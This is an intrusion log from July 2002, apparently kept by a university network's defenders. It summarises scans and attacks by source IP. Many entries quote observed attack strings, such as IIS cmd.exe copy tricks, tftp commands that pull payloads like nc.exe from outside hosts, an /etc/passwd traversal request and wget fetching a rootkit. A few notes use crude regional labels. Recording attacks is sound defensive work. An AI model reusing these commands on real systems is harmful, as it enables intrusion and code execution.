Short summary of some of the attacks against us for Jul. 2002


 year - time EASTERN source_ip[:port] (dns name, if any) attack/scan/notes

2002/07/01-00:06:00.92 61.177.251.125 (CHINANET jiangsu province network) 1. attack IIS servers thru 2002/07/01-04:53:40.90 w/command
2002/07/01-00:06:00.92 61.177.251.125 (CHINANET jiangsu province network) 2. tftp%20-i%20132.235.32.101%20GET%20cool.dll%20e:\httpodbc.dll
2002/07/01-09:05:19.24 213.224.83.118 (nchass03.telenet-ops.be) IIS attack 1. copy+\winnt\system32\cmd.exe+cmd1.exe
2002/07/01-09:05:19.24 213.224.83.118 (nchass03.telenet-ops.be) IIS attack 2. cmd1.exe?/c+echo+get+ServUDaemon.ini+>>TFTP1000_
2002/07/01-13:12:32.90 129.237.97.94 (University of Kansas,KA,US) IIS attack cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\kill.exe
2002/07/01-13:56:26.45 152.31.160.9 (www.weldoncityschools.k12.nc.us) portscan net for port   80
2002/07/01-14:12:13.00 63.136.112.69 (63-136-112-69.ADSL.CandW.ky) portscan net for port   80
2002/07/01-14:39:29.34 217.128.72.203 (AFontenayssB-103-1-1-203.abo.wanadoo.fr) scannet for port 21
2002/07/01-14:47:43.05 217.128.72.203 (AFontenayssB-103-1-1-203.abo.wanadoo.fr) portscan net for port   21
2002/07/01-14:57:53.83 132.248.200.38 (Universidad Nacional Autonoma de Mexico,MX) IIS attack tftp%20-i%20132.248.200.38
2002/07/01-15:14:20.63 213.51.120.15 (cc41746-a.sneek1.fr.nl.home.com) IIS attack tftp.exe+"-i"+213.51.120.15+get+WINMGNT.EXE+c:\WINMGNT.EXE
2002/07/01-17:15:48.24 24.112.151.202 (CPE525400db6e4f.cpe.net.cable.rogers.com) IIS attack tftp.exe%20-i%2024.112.151.202%20GET%20jrun.exe
2002/07/01-18:16:51.04 217.128.200.164 (AAnnecy-101-1-3-164.abo.wanadoo.fr) portscan net for port   21
2002/07/01-18:28:42.29 63.225.190.28 (NuWest Group, Inc.,WA,US) pound on servers on ports 139 445 137
2002/07/01-18:36:51.10 63.225.190.28 (NuWest Group, Inc.,WA,US) portscan net for port   445 139
2002/07/02-00:52:01.55 193.219.33.174 (dsp11.dsplab.ktu.lt) scannet for port 1524
2002/07/02-00:52:06.10 193.219.33.174 (dsp11.dsplab.ktu.lt) portscan net for port   1524
2002/07/02-03:02:08.41 207.35.71.175 (Metropolitain Media Corp.j) portscan net for port   80
2002/07/02-03:24:53.22 61.177.254.186 (CHINANET jiangsu province network) IIS attack tftp%20-i%20132.235.80.92%20GET%20cool.dll%20d:\httpodbc.dll
2002/07/02-08:24:45.89 141.76.1.121 (proxy1.anon-online.org) IIS attack - copy+c:\winnt\system32\cmd.exe+superlol.exe
2002/07/02-08:32:01.69 217.225.164.124 (pD9E1A47C.dip.t-dialin.net) IIS attack - copy+c:\winnt\system32\cmd.exe+c:\xxx.exe
2002/07/02-08:32:01.69 217.225.164.124 (pD9E1A47C.dip.t-dialin.net) IIS attack -tftp.exe?+-i+217.225.164.124+get+c:\a.exe+c:\a.exe 
2002/07/02-09:07:17.79 65.94.161.146 (MTL-HSE-ppp184858.qc.sympatico.ca) ping scan of net w/all zeros
2002/07/02-09:09:05.03 65.94.161.146 (MTL-HSE-ppp184858.qc.sympatico.ca) portscan net for port   1433 
2002/07/02-11:05:27.09 24.234.133.13 (cm013.133.234.24.lvcm.com) scannet for port 445
2002/07/02-12:53:43.04 65.101.243.110 (Berland Real Estate,CO,US) portscan net on port  80 
2002/07/02-12:57:20.54 65.101.243.105 (Berland Real Estate,CO,US) portscan net on port  80
2002/07/02-17:52:46.53 132.235.177.208 (dhcp-177-208.west-green.ohiou.edu) bang on topdog oprts 524,445,139
2002/07/03-04:35:24.06 149.156.28.99 (Academic Computer Centre ul. Nawojki 11,PL) portscan net on port  80
2002/07/03-09:28:05.71 148.245.149.31 () scannet for port  80
2002/07/03-09:50:11.38 134.208.27.62 () scannet for port  80
2002/07/03-11:34:04.40 134.208.27.62 (cssun2.csie.ndhu.edu.tw) sadmind work access
2002/07/03-14:37:39.13 205.221.194.241 () scannet for port  80
2002/07/03-16:03:41.02 63.171.10.246 () scannet for port  1433
2002/07/03-17:19:31.42 217.128.32.75 () scannet for port  21
2002/07/03-22:56:11.12 61.33.168.156 () scannet for port  21
2002/07/04-00:48:51.18 63.136.112.144 () scannet for port  1080
2002/07/04-01:15:11.32 129.174.41.126 () scannet for port  80
2002/07/04-02:20:38.56 61.177.247.32 () scannet for port  80
2002/07/04-02:37:29.25 61.177.244.7 () scannet for port  80
2002/07/04-04:38:00.01 61.177.246.56 () scannet for port  80
2002/07/04-04:59:32.06 61.177.247.167 () scannet for port  80
2002/07/04-06:01:29.19 24.234.133.13 (cm013.133.234.24.lvcm.com) ping scan of net, SNMNP public access udp of net
2002/07/04-06:02:08.80 24.234.133.13 (cm013.133.234.24.lvcm.com) 1. IIS server attacks such as 
2002/07/04-06:02:08.80 24.234.133.13 (cm013.133.234.24.lvcm.com) 2. GET /cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
2002/07/04-06:02:08.80 24.234.133.13 (cm013.133.234.24.lvcm.com) 3. portscan server on high number ports
2002/07/04-06:02:08.80 24.234.133.13 (cm013.133.234.24.lvcm.com) 4. heavy scan on ports 443,445,135,139,1025,8000,8080,161
2002/07/04-06:12:19.02 24.234.133.13 () scannet for port  1429
2002/07/04-12:03:00.27 24.234.133.13 (cm013.133.234.24.lvcm.com) back for more attacks
2002/07/04-14:37:06.58 65.214.36.153 () scannet for port  80
2002/07/04-14:52:36.45 65.214.36.156 () scannet for port  80
2002/07/04-15:12:27.07 24.234.133.13 (cm013.133.234.24.lvcm.com) 1. attack new IIS server - portscan it 1-10000+more,
2002/07/04-15:12:27.07 24.234.133.13 (cm013.133.234.24.lvcm.com) 2. scan microsoft ports, hit IIS buff overflows
2002/07/04-16:29:28.60 24.234.133.13 (cm013.133.234.24.lvcm.com) ftp attcks with root userid, dumb passwords
2002/07/04-17:20:20.80 137.122.50.52 (University of Ottawa,CA) IIS attack w/ tftp.exe+"-i"+137.122.50.52+get+WINMGNT.EXE+c:\WINMGNT.EXE
2002/07/04-18:00:33.40 61.144.142.14 () scannet for port  80 3128 8080
2002/07/04-22:34:44.10 24.234.133.13 (cm013.133.234.24.lvcm.com) back for mort portscanning, etc
2002/07/05-00:03:17.28 80.14.35.229 () scannet for port  21
2002/07/05-00:42:22.13 131.191.38.196 () scannet for port  80
2002/07/05-01:21:49.29 24.226.206.241 () scannet for port  80
2002/07/05-01:55:59.27 12.8.193.7 () scannet for port  80
2002/07/05-03:46:50.12 213.194.65.81 () scannet for port  1433
2002/07/05-05:03:20.01 61.177.246.196 () scannet for port  80
2002/07/05-06:57:19.07 213.23.20.62 () scannet for port  80
2002/07/05-07:22:41.44 80.200.102.58 () scannet for port  21
2002/07/05-08:56:11.64 132.248.225.121 (Universidad Nacional Autonoma de Mexico,MX) IIS attacks
2002/07/05-11:04:01.67 216.148.128.17 (Lexitrans, Inc.,KS,US) IIS attacks
2002/07/05-13:34:44.12 67.227.10.192 () scannet for port  25
2002/07/05-16:13:03.21 137.113.114.5 () scannet for port  80
2002/07/05-18:50:23.79 64.225.197.24 () scannet for port  445
2002/07/05-19:00:15.85 138.88.46.235 () scannet for port  1214
2002/07/05-19:46:47.14 61.177.254.209 () scannet for port  80
2002/07/05-20:02:30.43 61.177.253.144 () scannet for port  80
2002/07/05-20:17:46.27 61.177.254.33 () scannet for port  80
2002/07/05-20:21:51.17 61.177.254.33 (CHINANET jiangsu province network) 1. IIS attacks - cmds
2002/07/05-20:21:51.17 61.177.254.33 (CHINANET jiangsu province network) 2. tftp%20-i%20132.235.80.92%20GET%20cool.dll%20e:\httpodbc.dll
2002/07/05-21:44:22.19 61.177.247.30 () scannet for port  80
2002/07/06-05:13:03.33 62.190.169.179 (usergb179.dsl.pipex.com) ping scan of net
2002/07/06-05:17:12.85 62.190.169.179 () scannet for port  1433
2002/07/06-05:24:32.65 171.64.28.66 () scannet for port  139 445
2002/07/06-05:59:44.13 203.85.31.35 () scannet for port  111
2002/07/06-07:13:18.16 128.121.239.253 () scannet for port  80
2002/07/06-09:38:36.57 212.195.19.1 () scannet for port  21 139 1433 80
2002/07/06-10:21:51.06 217.74.161.53 (fga.krsn.ru) scannet fo rport 6112, BUFF  overflow attack
2002/07/06-10:22:00.74 217.74.161.53 (fga.krsn.ru) scannet for port 6112, buff overlofw attack (CDE dsspcd)
2002/07/06-10:22:15.36 217.74.161.53 () scannet for port  1524 6112
2002/07/06-12:41:13.12 171.64.28.66 () scannet for port  445 139
2002/07/06-19:09:05.63 172.182.7.208 () scannet for port  21
2002/07/06-20:43:52.35 61.248.209.239 () scannet for port  111
2002/07/06-20:43:59.15 61.248.209.239 () scannet for port  111
2002/07/06-21:49:46.47 217.136.34.134 () scannet for port  21
2002/07/07-00:52:56.98 211.20.23.69 () scannet for port  1433
2002/07/07-09:41:14.82 195.195.164.106 () scannet for port  1433
2002/07/07-12:12:28.95 213.0.71.154 () scannet for port  80
2002/07/07-13:03:31.24 128.248.80.67 () scannet for port  1433
2002/07/07-13:18:12.10 65.200.71.25 () scannet for port  445
2002/07/07-13:48:09.10 68.2.76.239 () scannet for port  1519
2002/07/07-13:49:33.63 128.248.80.67 (i080.oba.uic.edu) attack db server logging in as root, random passwds
2002/07/07-14:24:46.62 12.26.124.10 (alice.sunlitsurf.com) IIS attac - tftp+-i+213.51.1.133+GET+nc.exe+c:\\inetpub\\scripts\\nc.exe
2002/07/07-15:00:54.04 172.181.51.35 () scannet for port  21
2002/07/07-16:32:18.99 132.236.172.109 () scannet for port  80
2002/07/07-17:29:30.22 216.190.255.195 () scannet for port  25
2002/07/07-17:40:29.57 216.102.133.82 () scannet for port  80
2002/07/07-18:18:01.44 213.46.95.207 () scannet for port  21
2002/07/07-18:29:38.25 195.188.14.230 () scannet for port  80
2002/07/08-00:00:01.95 68.39.7.45 () scannet for port  21 22
2002/07/08-02:44:51.94 65.70.144.212 () scannet for port  139
2002/07/08-03:16:55.88 68.2.96.27 (ip68-2-96-27.ph.ph.cox.net) attack multiple WIN machines, setup ftp servers, IRC relays.
2002/07/08-03:50:35.33 61.179.119.208 () scannet for port  515
2002/07/08-03:51:56.83 203.69.237.32 (Tourism Bureau Ministry of Transportation and Communications,TW) IIS attacks
2002/07/08-06:45:57.25 65.29.179.39 () scannet for port  21
2002/07/08-06:46:03.24 65.29.179.39 (mke-65-29-179-39.wi.rr.com) scannet for port 21
2002/07/08-06:46:28.04 65.29.179.39 () scannet for port  21
2002/07/08-09:06:36.46 24.118.253.132 (c-24-118-253-132.mn.client2.attbi.com) try to conn to 132.235.1.8:6346 >150 times/day
2002/07/08-09:53:41.42 195.75.151.151:21 (Network of BCRS by IBM ITALIA,IT) scannet for port 21
2002/07/08-09:54:31.82 212.194.174.19 (lns08a-7-19.w.club-internet.fr) scannet for port 21, anon ftp attacks
2002/07/08-10:35:56.40 132.248.128.196 (Universidad Nacional Autonoma de Mexico) 1. IIS server attacks w/commands:
2002/07/08-10:35:56.40 132.248.128.196 (Universidad Nacional Autonoma de Mexico) 2. tftp%20-i%20132.248.128.196%20GET%20cool.dll%20c:\httpodbc.dll
2002/07/08-11:31:29.14 217.83.38.239 (pD95326EF.dip.t-dialin.net) attack 1 iis server +copy+c:\winnt\system32\cmd.exe+superlol.exe
2002/07/08-14:16:28.04 62.229.70.219 () scannet for port   80
2002/07/08-16:21:56.90 217.128.148.234 (ANice-104-1-1-234.abo.wanadoo.fr) scannet for port 21
2002/07/08-16:34:03.92 217.231.154.23 (pD9E79A17.dip.t-dialin.net) IIS attackcopy+c:\winnt\system32\cmd.exe+C:\inetpub\scripts\log.exe
2002/07/08-17:47:23.75 61.152.210.190 (Shanghai DigitalCom Information Industry Co.,CN) scannet for port 21
2002/07/08-19:13:37.59 195.242.51.88 () scannet for port   80
2002/07/08-21:37:04.26 80.63.241.194 (0x503ff1c2.albnxx11.adsl-dhcp.tele.dk) scannet for port   80 
2002/07/09-02:24:03.24 68.63.204.144 (pcp01304431pcs.pimaco01.az.comcast.net) scannet for port   445 
2002/07/09-06:32:32.03 129.186.205.67 () scannet for port   22 
2002/07/09-15:53:37.25 12.101.211.126 (126.mudb.detr.sfldmibv.dsl.att.net) scannet for port 21
2002/07/09-15:53:37.33 12.101.211.126 (126.mudb.detr.sfldmibv.dsl.att.net) scannet for port 21
2002/07/09-17:16:56.01 217.74.161.53 (fga.krsn.ru) scannet for port 6112, buff overflow attacks CDE dtspcd
2002/07/10-04:35:43.43 195.116.217.41:22 (edukacja.lo.pl) scannet for port 22,21
2002/07/10-04:35:52.37 195.116.217.41 (edukacja.lo.pl) scannet for port   22
2002/07/10-06:15:08.62 193.251.24.113 (ALimoges-101-1-1-113.abo.wanadoo.fr) scannet for port 21,anon ftp attacks
2002/07/10-06:15:28.06 193.251.24.113 (ALimoges-101-1-1-113.abo.wanadoo.fr) scannet for port   21
2002/07/10-07:40:42.78 172.177.255.238 (ACB1FFEE.ipt.aol.com) scannet for port 21
2002/07/10-08:40:50.17 65.186.163.29 (dsl-65-186-163-29.telocity.com) scannet for port   139
2002/07/10-09:34:19.37 218.233.206.48 (korea crap) scannet for port 1433
2002/07/10-11:50:25.05 216.190.255.195 (Wasatch Hosting ,UT,US) scannet for port   25
2002/07/10-13:14:44.19 172.186.179.142 (ACBAB38E.ipt.aol.com) scannet for port 21 ,anon ftp attacks
2002/07/10-13:20:26.08 211.66.88.8 (gdaib.edu.cn) scannet for port   111 21
2002/07/10-14:09:54.33 80.15.69.232 (ABrest-103-1-4-232.abo.wanadoo.fr) scannet for port   21
2002/07/10-15:01:37.02 172.178.3.237 (ACB203ED.ipt.aol.com) scannet for port   21
2002/07/10-15:21:42.08 61.194.193.192 (SAFe Inc.,JP) scannet for port 6112, buff overflow attackCDE dtspcd
2002/07/10-16:35:32.05 128.32.239.104 (conan.EECS.Berkeley.EDU) scannet for port 21
2002/07/10-17:33:05.57 213.99.84.217 (213-99-84-217.uc.nombres.ttd.es) anon ftp dummy passwd file from ace
2002/07/10-17:39:46.49 158.121.125.35 (wspowerpcl.stu-life.umb.edu) scannet for port   80
2002/07/10-17:47:46.78 132.239.84.198 (evileye.ucsd.edu) try to use 132.235.1.52 and dsn server.
2002/07/10-18:40:00.00 172.186.241.34 (ACBAF122.ipt.aol.com) scannet for port   21
2002/07/10-19:25:42.03 212.199.236.233 (Golden Lines,IL) IIS attack tftp.exe+"-i"+212.199.236.233+get+TLIST.EXE
2002/07/10-22:01:56.34 200.30.47.70 (Eccel S.A,QUINDIO.CL) 1. IIS attack copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe
2002/07/10-22:01:56.34 200.30.47.70 (Eccel S.A,QUINDIO.CL) 2. ftp to badtown.dynu.com usr/pass  server/leech  get serv-u ftp daemon.
2002/07/10-22:01:56.34 200.30.47.70 (Eccel S.A,QUINDIO.CL) 3. install in c:\recycler\bin\a
2002/07/10-23:35:42.30 217.209.74.93 (h93n2fls33o899.telia.com) portscan 132.235.1.36 on 80,110,22,25,6000,23,22
2002/07/10-23:47:58.88 217.209.74.93 (h93n2fls33o899.telia.com)  try to login to 132.235.1.36 as phikz
2002/07/11-07:40:59.75 24.60.226.113 (h002078cc84f1.ne.client2.attbi.com) try all day to connect to   132.235.1.252 : 2025 - why?
2002/07/11-15:10:38.55 216.9.67.18 (orf-sdsl-lan-216-9-67-18.pinn.net) scann net for port   80
2002/07/11-16:34:35.00 132.235.198.68 (dhcp-198-068.cns.ohiou.edu) portscan 132.235.17.1
2002/07/11-17:03:09.07 217.1.118.178 (pD90176B2.dip.t-dialin.net) conn tp 132.235.1.54 : 500 UDP and 132.235.1.54 : 80
2002/07/11-17:53:51.39 203.69.237.32 (Tourism Bureau Ministry of Transportation and Communications,TW) 1. IIS attacks w/command
2002/07/11-17:53:51.39 203.69.237.32 (Tourism Bureau Ministry of Transportation and Communications,TW) 2. tftp%20-i%20132.32.7.238%20GET%20cool.dll
2002/07/11-19:28:33.03 217.225.241.67 (pD9E1F143.dip.t-dialin.net) scann net for port   80
2002/07/11-19:35:17.78 195.232.55.5:21 (fra-tgn-oyw-vty5.as.wcom.net) scannet for port 21
2002/07/11-20:13:14.64 195.232.55.3:21 (fra-tgn-oyw-vty3.as.wcom.net) scannet for port 21
2002/07/11-20:23:24.10 195.232.55.3 (fra-tgn-oyw-vty3.as.wcom.net) 1. snmpXdmi, dtspcd buff overflow attacks, port 111 scans 
2002/07/11-20:23:24.10 195.232.55.3 (fra-tgn-oyw-vty3.as.wcom.net) 2. break into sun machine, ftp to 62.211.66.16 w/ user/pass
2002/07/11-20:23:24.10 195.232.55.3 (fra-tgn-oyw-vty3.as.wcom.net) 3. fasciofascio/cicciociccio to get wget. Use wget to get rootkit
2002/07/11-20:23:24.10 195.232.55.3 (fra-tgn-oyw-vty3.as.wcom.net) 4. from http://62.211.66.55/fasciofascio/sun.tar
2002/07/11-20:54:22.22 213.22.214.112 (a213-22-214-112.netcabo.pt) scann net for port   80
2002/07/11-21:39:09.73 200.30.47.70 ( ) attack IIS server w/ copy+c:\winnt\system32\cmd.exe+c:\inetpub\s
2002/07/11-23:04:03.56 210.77.137.162 ( ) attack IIS server w/ tftp%20-i%20132.147.160.61%20GET%20cool.dll
2002/07/12-00:32:43.83 203.69.216.75 (East Jean Ltd.Taiwan Branch (Hong Kong),Taipei,TW) scan net for port 1433
2002/07/12-00:34:13.12 203.69.216.75 (East Jean Ltd.Taiwan Branch ,TW) scann net for port   1433
2002/07/12-00:42:41.37 68.61.169.14 (pcp01120877pcs.flshng01.mi.comcast.net) IIS attack - tftp.exe+"-i"+24.157.158.23+get+WINMGNT.EXE
2002/07/12-00:43:28.75 68.61.169.14 (pcp01120877pcs.flshng01.mi.comcast.net) IIS attack - tftp.exe+"-i"+68.61.169.14+get+WINMGNT.EXE
2002/07/12-03:56:45.57 165.139.183.1 (Indiana Higher Education Telecommunication System ,IN,US) scann net for port   80
2002/07/12-03:59:14.18 211.216.52.194 (korea crap) scann net for port   22
2002/07/12-05:45:44.10 211.190.103.8 (Onse Telecom,KYONGGI,KR) scannet for port 1433
2002/07/12-06:04:32.22 216.136.225.11:5050 (cs16.msg.sc5.yahoo.com) probe port 42890 on p1 1 packet every 10 mins.
2002/07/12-07:43:06.31 200.237.121.78 () scannet for port  139 
2002/07/12-10:28:00.14 80.136.213.29 () scannet for port  80 
2002/07/12-10:32:55.20 62.190.169.179 (usergb179.dsl.pipex.com) scannetfo rport 1433
2002/07/12-10:32:55.68 62.190.169.179 (usergb179.dsl.pipex.com) ping scan of net
2002/07/12-10:35:14.03 62.190.169.179 () scannet for port  1433 
2002/07/12-14:05:30.03 217.136.118.64 () scannet for port  21 
2002/07/12-14:36:22.00 80.133.73.233 (p508549E9.dip.t-dialin.net) scannet for port 80
2002/07/12-14:36:55.22 80.133.73.233 () scannet for port  80 
2002/07/12-14:37:16.72 80.133.73.233 (p508549E9.dip.t-dialin.net) cmd.exe access on IIS thru 15:48:21.67 >2500 times
2002/07/12-15:51:39.32 68.81.139.125 (pcp01328366pcs.chrstn01.pa.comcast.net) 1. scannet fo rport 445, 80, probe secect ips heavy
2002/07/12-15:51:39.32 68.81.139.125 (pcp01328366pcs.chrstn01.pa.comcast.net) 2. SMB attacks
2002/07/12-16:03:17.07 68.81.139.125 () scannet for port  445 80 
2002/07/12-19:09:35.54 80.13.125.209 (AReims-105-1-3-209.abo.wanadoo.fr) scannet for port 21
2002/07/12-19:17:38.24 80.13.125.209 () scannet for port  21 
2002/07/12-21:05:19.56 80.132.50.141 () scannet for port  80 
2002/07/13-02:03:50.74 193.131.87.203 () scannet for port  139 
2002/07/13-03:44:04.07 217.136.118.64 (adsl-63040.turboline.skynet.be) scannet for port 21, anon ftp attacks
2002/07/13-06:02:32.45 212.43.243.137 (137.rev.seckomtek.com) scan select ips for port 1024,3072
2002/07/13-06:03:09.65 216.136.225.11:5050 (cs16.msg.sc5.yahoo.com) still probe port 42890 on p1 1 packet every 10 mins.
2002/07/13-07:07:59.26 213.56.68.99 () scannet for port  139
2002/07/13-07:13:21.17 213.56.68.99 () scannet for port  139 
2002/07/13-08:41:32.73 217.128.73.176 (ARennes-303-1-3-176.abo.wanadoo.fr) ping scan of net
2002/07/13-08:41:33.66 217.128.73.176 (ARennes-303-1-3-176.abo.wanadoo.fr) scannet for port 135,139
2002/07/13-08:41:33.66 217.128.73.176 (ARennes-303-1-3-176.abo.wanadoo.fr) scannet for ports 21,23,80,445,139,137,180
2002/07/13-08:42:13.52 217.128.73.176 () scannet for port  21 23 135 139 180 80 445 
2002/07/13-12:12:40.46 198.163.214.100 () scannet for port  3128 23 8080 6588 80 1080 
2002/07/13-17:11:30.08 80.13.200.110 () scannet for port  21 
2002/07/13-17:21:06.92 217.224.229.168 (pD9E0E5A8.dip.t-dialin.net) 1. attack iis server, start ftp server w/command:
2002/07/13-17:21:06.92 217.224.229.168 (pD9E0E5A8.dip.t-dialin.net) 2. c:\WINNT\system32\ras\.temp\.data\.user\.files\.stuff\svchost.exe
2002/07/14-00:10:36.27 217.85.136.249 () scannet for port  80 
2002/07/14-01:42:02.31 63.136.112.247 (63-136-112-247.ADSL.CandW.ky) probe select ips on port 21
2002/07/14-01:42:22.11 63.136.112.247 () scannet for port  21 
2002/07/14-04:47:05.71 24.192.152.243 (CPE00d009db9455-CM00803785d223.cpe.net.cable.rogers.com) attack IIS server tftp.exe+"-i"+24.192.152.243+get+WINMGNT.EX
2002/07/14-10:14:26.63 24.208.177.204 () scannet for port  48824 39941 46169 6792 8579
2002/07/14-13:55:39.90 172.169.151.61 () scannet for port  40418 42205 43995 10845 9056
2002/07/14-14:54:09.95 200.226.136.138 (138.136.226.200.in-addr.arpa.ig.com.br) 1 packet to random high port on 3 ips.
2002/07/14-16:21:53.44 142.177.221.244 () scannet for port  80 
2002/07/15-02:12:15.60 200.226.136.137 (137.136.226.200.in-addr.arpa.ig.com.br) 1 packet to random high port on 13 ips.
2002/07/15-02:13:37.53 128.146.98.56 (emptweb.mps.ohio-state.edu) scannet for port 445
2002/07/15-02:15:17.80 128.146.98.56 () scannet for port  445 
2002/07/15-03:01:08.27 67.37.164.161 () scannet for port  80 
2002/07/15-05:55:41.96 217.235.56.95 () scannet for port  80 
2002/07/15-05:59:20.76 200.226.136.137 (137.136.226.200.in-addr.arpa.ig.com.br)1 packet to random high port on 80 ips to 21:57:01.07
2002/07/15-11:41:58.55 212.34.196.98 (CITIES ON LINE NETWORK,IT) scannet for port 1433
2002/07/15-12:37:49.87 66.236.179.198 (XO Communications ,CA,US) scannet for port 1433
2002/07/15-13:07:35.93 212.129.55.238 (dyn-212-129-55-238.ppp.tiscali.fr) ping scan of net
2002/07/15-23:51:38.74 61.147.60.133 (CHINANET jiangsu province network) try to connect to 132.235.1.35 : 21
2002/07/16-20:31:00.69 66.179.34.19 (Gravity Corp,GA,US) scannet fo rport 1024
2002/07/17-03:36:44.70 61.147.60.68 (CHINANET jiangsu province network) try to connect to 132.235.1.35 : 21
2002/07/17-06:45:21.47 62.194.78.11 (node-c-4e0b.a2000.nl) scannet for port 21
2002/07/17-10:07:48.03 217.136.121.100 (adsl-63844.turboline.skynet.be) scan multiple ips fo rprt 1433
2002/07/17-12:12:27.92 80.116.172.146 (Telecom Italia,IT) scannet for port 23
2002/07/17-17:56:55.44 64.80.200.219 (Astea Inc,PA,US) scannet for port 1433
2002/07/17-22:44:10.03 209.246.70.145 (dialup-209.246.70.145.Dial1.NewYork1.Level3.net) 1. IIS attack w/command 
2002/07/17-22:44:10.03 209.246.70.145 (dialup-209.246.70.145.Dial1.NewYork1.Level3.net) 2. c+echo+get%20servudaemon. .. etc
2002/07/17-22:44:10.03 209.246.70.145 (dialup-209.246.70.145.Dial1.NewYork1.Level3.net) 3. frtp to 138.87.45.4:5078 u/p shit/shit
2002/07/17-23:18:15.17 172.186.157.63 (ACBA9D3F.ipt.aol.com) scannet for port 21
2002/07/18-05:15:13.94 216.187.66.88 (ACTADIVINA,Langley, BC ,CA) slow  scan random ips 1 packt to high numb port
2002/07/18-05:47:58.72 61.147.60.220 (CHINANET jiangsu province network) try to connect to 132.235.1.35 : 21
2002/07/18-06:20:18.06 62.90.172.225 (adsl-172-225.barak.net.il) scannet for port 21
2002/07/18-06:29:29.21 61.36.48.58 (LG VILLAGE APT,KYONGGI,KR) scannet for port 111, buff overflow attacks
2002/07/18-08:28:58.36 212.77.224.191 (adserver.netzpiloten.de) slow scan random ips 1 packt to high numb port
2002/07/18-09:12:15.37 62.107.157.240 (3E6B9DF0.slag.stofanet.dk) attack IIS on 132.235.18.105, mkdir c:\exchange    etc..
2002/07/18-09:24:14.31 200.181.139.75 (4-075.ctame701-4.telepar.net.br) attack IIS on 132.235.18.105
2002/07/18-10:01:56.91 68.80.219.60 (pcp01361467pcs.jamisn01.pa.comcast.net)  attack IIS on 132.235.18.105
2002/07/18-12:13:28.35 65.31.6.185 (dhcp065-031-006-185.insight.rr.com) probe 132.235.1.162 : 6346
2002/07/18-12:55:27.75 211.220.135.3 (korea crap) scannet for port 1433
2002/07/18-13:02:21.12 206.208.62.141 (CACHE1.SPACEY.NET)  attack IIS on 132.235.18.105
2002/07/18-20:20:43.67 213.96.165.79 (213-96-165-79.uc.nombres.ttd.es) IIS attack
2002/07/18-20:37:21.51 67.68.128.171 (Toronto-HSE-ppp3756540.sympatico.ca) scan several ips, ports 27374 12345 139
2002/07/18-20:40:09.38 66.78.14.220 (Virtual Development INC,NJ,US) slow scan of net, 1 pkt per ip
2002/07/19-02:30:56.51 209.9.22.167 (209-9-22-167.sdsl.cais.net) scannet for port 445
2002/07/19-05:20:54.90 80.13.190.114 (ALille-102-1-3-114.abo.wanadoo.fr) scannet for port 1433
2002/07/19-05:21:22.89 80.13.190.114 (ALille-102-1-3-114.abo.wanadoo.fr) scannet for port 1433
2002/07/19-09:28:28.27 65.24.133.141 (dhcp065-024-133-141.columbus.rr.com) ping scan of net
2002/07/19-09:28:28.48 65.24.133.141 (dhcp065-024-133-141.columbus.rr.com) portscan ace,boss, deuce
2002/07/19-14:46:09.59 217.230.10.43 (pD9E60A2B.dip.t-dialin.net) FTP format string attempt (ftp://%a:%p/) on several ftp servers
2002/07/19-14:46:23.51 217.230.10.43 (pD9E60A2B.dip.t-dialin.net) scannet for port 21
2002/07/19-14:46:38.14 217.230.10.43 (pD9E60A2B.dip.t-dialin.net) ICMP superscan echo of net
2002/07/19-18:09:52.52 132.235.8.77 (juniper.cns.ohiou.edu) scannet on port 161
2002/07/20-00:14:59.02 211.102.32.3 (Capital network, LTD,BEIJING,CN) scannet for port 21
2002/07/20-14:21:00.79 66.140.58.57 (adsl-66-140-58-57.dsl.rcsntx.swbell.net) scannet for port 25
2002/07/20-14:45:42.76 80.11.219.121 (APlessis-Bouchard-106-1-1-121.abo.wanadoo.fr) scannet for port 1433
2002/07/20-15:26:08.00 61.156.9.133 (CHINANET Shandong province network) scannet for port 111, sadmind buff overflow attacks
2002/07/20-18:15:46.90 203.69.237.32 (HINET-TW,TW0 IIS attack tftp%20-i%20132.32.7.238%20GET%20cool.dll%20c:\httpodbc.dll
2002/07/20-22:13:52.91 139.81.32.154 (GLI,GA,US) portscan ace 
2002/07/21-02:18:26.23 68.63.204.144 (pcp01304431pcs.pimaco01.az.comcast.net) scannet fo rport 445
2002/07/21-02:40:16.01 66.52.57.138 (dialup-66-52-57-138.digitalputty.com) scannet for port 1433
2002/07/21-14:28:04.66 217.235.83.99 (pD9EB5363.dip.t-dialin.net) IIS attack copy+c:\winnt\system32\ftp.exe+2.exe
2002/07/21-21:22:08.77 130.228.43.55 (Brunata,DK) scannet for port 22
2002/07/21-23:51:29.15 24.201.170.22 (modemcable022.170-201-24.mtl.mc.videotron.ca) scannet for ports 445,137,139,80
2002/07/22-03:20:54.58 24.201.170.22 (modemcable022.170-201-24.mtl.mc.videotron.ca) IIS view source via translate header attacks
2002/07/22-12:15:34.34 65.31.6.185 (dhcp065-031-006-185.insight.rr.com) scannet for port 6346
2002/07/22-12:17:00.19 24.132.68.215 (node144d7.a2000.nl) scannet fo rport 1433
2002/07/22-12:44:57.38 24.201.170.22 (modemcable022.170-201-24.mtl.mc.videotron.ca) 1. scannet for ports 137,139,80,445 
2002/07/22-12:44:57.38 24.201.170.22 (modemcable022.170-201-24.mtl.mc.videotron.ca) 2. pound on select ips port s 139,445
2002/07/22-15:00:14.90 80.116.241.111 (Telecom Italia,IT) scannet fo rport 1080
2002/07/22-17:53:10.38 193.252.110.234 (ARennes-303-1-2-234.abo.wanadoo.fr) 1. scannet for port 135,139 -
2002/07/22-17:53:10.38 193.252.110.234 (ARennes-303-1-2-234.abo.wanadoo.fr) 2. portscan 132.235.4.66 21,23,80,180,445,139
2002/07/22-18:48:49.89 24.167.240.9 (mke-24-167-240-9.wi.rr.com) ping scan of net, ports 80,445, pound on several ips port 445
2002/07/22-22:13:10.19 80.13.85.172 (APoitiers-106-1-4-172.abo.wanadoo.fr) scannet for port 1433
2002/07/22-23:12:35.36 212.199.240.251 (Golden Lines,IL) scannet fo rport 1433
2002/07/23-03:31:21.60 66.33.60.86 (kerney.lumtech.com) scannet fo rport 21
2002/07/23-06:33:48.32 172.138.3.80 (AC8A0350.ipt.aol.com) heavy scans of net fo rport 139
2002/07/23-06:33:57.33 172.138.3.80 (AC8A0350.ipt.aol.com) scannet for port 27374
2002/07/23-13:47:30.16 217.231.235.37 (pD9E7EB25.dip.t-dialin.net) ping scan of net, scannet for port 21
